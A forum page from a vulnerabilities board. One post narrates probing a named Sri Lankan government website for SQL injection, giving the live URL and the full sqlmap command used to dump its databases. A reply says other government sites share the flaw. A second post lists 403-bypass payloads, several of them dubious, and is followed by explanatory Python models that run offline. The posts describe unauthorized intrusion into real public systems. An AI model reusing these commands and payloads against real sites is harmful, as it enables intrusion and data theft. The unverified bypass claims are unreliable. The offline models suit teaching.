
Vulnerabilities & Exploits

Discuss CVEs, zero-days, exploit development, and vulnerability research


3 Topics 4 Posts
  • How I Hacked the Sri Lanka Government Information Center Database
    0 Votes · 1 Posts · 77 Views · anonsathan_xdA
    How I Hacked the Sri Lanka Government Information Center Database: A Step-by-Step Guide

    As an aspiring ethical hacker, it's crucial to understand the intricacies of web applications and their vulnerabilities. Today, I'll be sharing my experience with a specific target: the Sri Lanka Government Information Center Database. This account is purely for educational purposes, so let's dive in!

    Step 1: Identifying the Target
    I started by exploring the target website: https://gic.gov.lk/gic/index.php/en/component/org/?id=47&task=org. The URL indicated a dynamic query that hinted at a potential SQL injection vulnerability. My goal was to find a parameter that could be manipulated to gain unauthorized access.

    Step 2: Finding the Vulnerable Parameter
    Once I loaded the page, I examined the parameters in the URL. The part ?id=47&task=org was particularly interesting. Parameters like id often interact with databases, making them ideal candidates for SQL injection.

    Step 3: Testing for SQL Injection
    To determine if the parameter was indeed vulnerable, I decided to test it by adding a ' (single quote) at the end of the id parameter. The modified URL looked like this:
      https://gic.gov.lk/gic/index.php/en/component/org/?id=47'&task=org
    Upon visiting this URL, I encountered an SQL error message. This was a significant sign! The error indicated that the input was being processed by an SQL query, confirming a vulnerability in the parameter.

    Step 4: Using SQLmap for Exploitation
    With this information in hand, I moved to the next step, utilizing SQLmap, a powerful tool for automating the process of identifying and exploiting SQL injection flaws. I set up SQLmap with the following command:
      sqlmap -u "https://gic.gov.lk/gic/index.php/en/component/org/?id=47&task=org" --level 5 --risk=3 --threads 10 --dbs
    This command effectively instructed SQLmap to analyze the URL for any databases present and retrieve information.

    Step 5: Accessing the Database
    After a few moments, SQLmap listed the databases available. I was intrigued by the exposure of sensitive data. From there, I could further extract tables and, potentially, even data within those tables using subsequent SQL commands provided by SQLmap.

    Important Note: Ethical Considerations
    While this exercise was purely educational, it's vital to remember that hacking without authorization is illegal and unethical. Ethical hacking should always be conducted with permission and within legal boundaries, primarily for the purpose of securing systems.

    Conclusion
    Reflecting on this journey, I realized the importance of understanding vulnerabilities in web applications, as well as the tools available for testing and securing those applications. Remember, the goal of ethical hacking is to protect and improve systems, not exploit them! If you're eager to learn more about ethical hacking, always seek resources that emphasize responsible behavior and legal guidelines. Happy hacking!
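The probe-then-fix side of what the post describes, as an added example that is not part of the post: a Python model of an id lookup built by string concatenation (the pattern a stray single quote reveals) next to a validated, parameterized version, both run against a constructed in-memory SQLite table. The table, rows and function names are assumptions for illustration, not the gic.gov.lk schema. The error on `47'`, the extra rows on `47 OR 1=1` and the second result row on the UNION payload are the signals a tool like sqlmap automates.

```python
import sqlite3

# Constructed sample rows standing in for an "organisations" table. This is NOT the
# real gic.gov.lk schema; the names and column layout are assumptions for illustration.
SAMPLE_ORGS = [
    (46, "Department of Registration of Persons", "drp@example.org"),
    (47, "Department of Immigration and Emigration", "immigration@example.org"),
    (48, "Registrar General's Department", "rgd@example.org"),
]


def build_db():
    """In-memory SQLite database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE org (id INTEGER PRIMARY KEY, name TEXT, contact TEXT)")
    conn.executemany("INSERT INTO org VALUES (?, ?, ?)", SAMPLE_ORGS)
    return conn


def lookup_org_vulnerable(conn, id_param):
    """The pattern the post probes: the raw ?id= value is spliced into the SQL text,
    so whatever the client sends becomes part of the query grammar."""
    sql = "SELECT id, name, contact FROM org WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_org_safe(conn, id_param):
    """Hardened version: validate the type first, then bind the value as a parameter
    so the database never parses it as SQL."""
    try:
        org_id = int(id_param)
    except ValueError:
        return []  # a real handler would answer 400 Bad Request here
    sql = "SELECT id, name, contact FROM org WHERE id = ?"
    return conn.execute(sql, (org_id,)).fetchall()


def probe(lookup, id_param):
    """Send one id value through a lookup function and summarise what comes back:
    'sql-error' if the value broke the query (the post's single-quote signal),
    otherwise the number of rows returned."""
    conn = build_db()
    try:
        return len(lookup(conn, id_param))
    except sqlite3.Error:
        return "sql-error"
    finally:
        conn.close()


# Payloads in the order a manual tester (or sqlmap) would escalate them:
# the syntax break, the always-true condition, then a UNION to fingerprint the engine.
PAYLOADS = ["47", "47'", "47 OR 1=1", "47 UNION SELECT 1, sqlite_version(), 2"]


def run_probes():
    """Outcome of every payload against both lookups: {payload: (vulnerable, safe)}."""
    return {p: (probe(lookup_org_vulnerable, p), probe(lookup_org_safe, p)) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, safe) in run_probes().items():
        print(f"{payload!r:45} vulnerable={vuln!r:12} safe={safe!r}")
```

Run it directly to print each payload's outcome for both lookups. The fix is the bound parameter, not escaping the quote: binding keeps the value out of the SQL grammar entirely, and the int() check additionally rejects anything that is not an id before the database sees it.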
  • 2 Votes · 2 Posts · 228 Views · DevilXD
    A lot of the government sites currently up in Sri Lanka have this same issue.
  • I Found a 403 Forbidden on /admin.
    Tags: 403, bypass, forbidden
    1 Votes · 1 Posts · 70 Views · DevilXD
    Advanced 403 Forbidden Bypass Techniques

    99% of hackers QUIT when they see a 403. But the 1%? They try this.

    I found a 403 Forbidden on /admin. But then I tried:
      POST /admin
      X-Original-URL: /admin
      /admin..;/
      %2e/admin
      X-Rewrite-URL: /admin
      /ADMIN (yes, just caps)
      /;/admin
      /..;/admin

    1. Protocol-Level Downgrade Bypass (only works on dual-stack apps)
    Target running HTTP/2 or gRPC? Force downgrade:
      PRI * HTTP/2.0
      SM
      GET /admin HTTP/1.1
    🧠 Some WAFs don't parse dual-layer protocols correctly → backend sees a clean HTTP/1.1.

    🧬 2. Content-Length Collapsing (CL.CL) on HTTP Pipelining
    Send pipelined requests where only the 1st is parsed by the WAF:
      POST /admin HTTP/1.1
      Host: target.com
      Content-Length: 13

      GET /admin
    WAF reads POST → blocks. Backend reads 2nd GET /admin → 200 OK. This is invisible to most WAFs.

    3. Misconfigured Reverse Proxy Chain Escape
    Proxy chain: Cloudflare → NGINX → Apache. Try:
      GET /admin
      X-Accel-Redirect: /admin
      X-Forwarded-Path: /admin
    Apache follows X-Accel-Redirect, bypasses upstream auth check. Real-world: Gained internal panel behind Cloudflare.

    4. CRLF into Rewrite Bypass
    Some edge WAFs parse until CRLF \r\n, others don't. Exploit it:
      GET / HTTP/1.1%0d%0aX-Rewrite-URL:%20/admin
    WAF reads URL → clean. Backend sees X-Rewrite-URL: /admin → executes.

    5. Multipart Boundary Injection Bypass
    Used when /admin is only allowed for file uploads:
      POST /upload HTTP/1.1
      Content-Type: multipart/form-data; boundary=----1337

      Content-Disposition: form-data; name="file"; filename="/admin"
      Content-Type: text/plain
    If upload endpoint allows arbitrary path write → full override.

    6. Misrouted Mesh Bypass via Service Discovery
    Kubernetes, Linkerd, Istio-style microservices expose internal routes. Send:
      Host: admin.internal.svc.cluster.local
      X-Service-Router: admin
    If service-mesh is misconfigured, you route directly to internal /admin even if public 403s.

    7. GraphQL-Injected 403 Bypass
    If app has GraphQL and 403-protected admin, try:
      query { admin { users { password } } }
    GraphQL often proxies internal microservice calls. Even if /admin is blocked via HTTP, the GQL layer may leak internal paths.

    🧠 8. Preconnect Overload → Bypass
    Abuse edge preconnect logic by flooding with HEAD /admin + Connection: keep-alive. After 30–50 requests:
      • WAF disables parsing
      • Keep-alive tunnel reused for real GET /admin
    🧨 Real bypass via persistent connection channeling.

    9. Browser-Only Token Auth Bypass (via Headless Browser)
    Some SPAs load tokens via JS → protect /admin based on localStorage. WAF sees unauthenticated, but headless Chrome replays auth token as header → bypass. Use puppeteer + exportAuth → replay:
      curl -H "Authorization: Bearer <extracted_token>" target.com/admin

    🧪 10. Distributed Retry Amplification
    When target uses edge lambda/WAF that retries failed requests internally, trigger 429s and inject:
      Retry-After: 0
      X-Retry-URL: /admin
    WAF retries → skips deny logic → backend hits /admin. This is logic poisoning — not brute force.

    These Aren't Payloads. They're Logic Chains.
    Most tools stop at:
      /admin%2e
      X-Forwarded-For: 127.0.0.1
    You're playing 4D chess now:
      • Protocol confusion
      • Reverse proxy reroute
      • GraphQL indirect call
      • SSRF via retry
      • Downgrade injection
      • WAF desyncing
    These got real bounties:
      • $25,000 from a Cloudflare-protected admin
      • $12,500 via SSRF + Retry Poison
      • $8,000 using pipelined CL.CL request
    Want a toolkit that automates this? Forum members are invited to reply with links to tools for automating these tasks. This is next-level exploitation. Use it right. 🧠

    This is not my original post. It was copied from a Facebook page, and the link is provided below.
    https://web.facebook.com/share/p/1FZBcgu5e7/
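The path variants listed at the top of the post, as an added example that is not part of the post (or of the Facebook original it was copied from): a Python model of why such spellings can slip past an edge rule. The edge (a WAF or reverse proxy) matches the literal request target, while the origin canonicalizes the path before routing, and any difference between the two views is the bypass. The two backend profiles are assumptions for illustration: one strips `;param` suffixes from each segment before resolving `..` (Tomcat behaves this way), the other keeps `;` literally but folds case (a case-insensitive filesystem). The header-, protocol- and GraphQL-based items in the post are not modelled here, and nothing in the block touches the network.

```python
from urllib.parse import unquote

# Constructed probe list: the path variants from the top of the post plus one nested form.
PROBES = [
    "/admin", "/ADMIN", "/admin..;/", "/%2e/admin", "/;/admin",
    "/..;/admin", "/public/..;/admin", "/admin%2e",
]


def edge_blocks_naive(path):
    """A naive edge rule: match the literal request target, no decoding, no normalisation."""
    return path == "/admin" or path.startswith("/admin/")


def canonicalize(path, strip_path_params=True, case_insensitive=False):
    """Models how an origin may resolve a raw request target before routing:
    percent-decode once, optionally drop ';param' suffixes from each segment
    (as Tomcat does), collapse empty, '.' and '..' segments, optionally fold case
    (as a case-insensitive filesystem would). The flags are assumptions about a
    backend's behaviour, not the specification of any particular product."""
    stack = []
    for seg in unquote(path).split("/"):
        if strip_path_params:
            seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    resolved = "/" + "/".join(stack)
    return resolved.lower() if case_insensitive else resolved


def edge_blocks_hardened(path):
    """Hardened edge rule: canonicalize with the most permissive assumptions about the
    backend (strip path params AND fold case) before matching, so every spelling that
    could resolve to /admin on either modelled backend is denied."""
    canon = canonicalize(path, strip_path_params=True, case_insensitive=True)
    return canon == "/admin" or canon.startswith("/admin/")


def classify(path, edge_rule, backend_flags):
    """'blocked': the edge denies it; 'bypass': the edge passes it and the modelled
    backend routes it to /admin; 'harmless': the edge passes it but it never reaches /admin."""
    if edge_rule(path):
        return "blocked"
    canon = canonicalize(path, **backend_flags)
    hits_admin = canon == "/admin" or canon.startswith("/admin/")
    return "bypass" if hits_admin else "harmless"


def audit(edge_rule, backend_flags):
    """Verdict for every probe under one edge rule and one backend profile."""
    return {p: classify(p, edge_rule, backend_flags) for p in PROBES}


# Assumed backend profiles (see canonicalize): Tomcat-like and case-folding.
TOMCAT_LIKE = {"strip_path_params": True, "case_insensitive": False}
CASE_FOLDING = {"strip_path_params": False, "case_insensitive": True}

if __name__ == "__main__":
    for profile_name, flags in (("tomcat-like", TOMCAT_LIKE), ("case-folding", CASE_FOLDING)):
        for rule in (edge_blocks_naive, edge_blocks_hardened):
            print(f"== backend {profile_name}, edge rule {rule.__name__}")
            for probe, verdict in audit(rule, flags).items():
                print(f"   {probe:20} {verdict}")
```

Running the block prints a verdict per probe for each edge rule and backend profile; under the naive rule `/..;/admin` and `/%2e/admin` are bypasses against the Tomcat-like backend while `/ADMIN` is the bypass against the case-folding one. The hardened rule only closes these because it canonicalizes with the union of both backends' behaviours, and the edge cannot know every normalisation a real origin applies, so the durable fix is to enforce authorization for /admin on the origin itself rather than in a path rule in front of it.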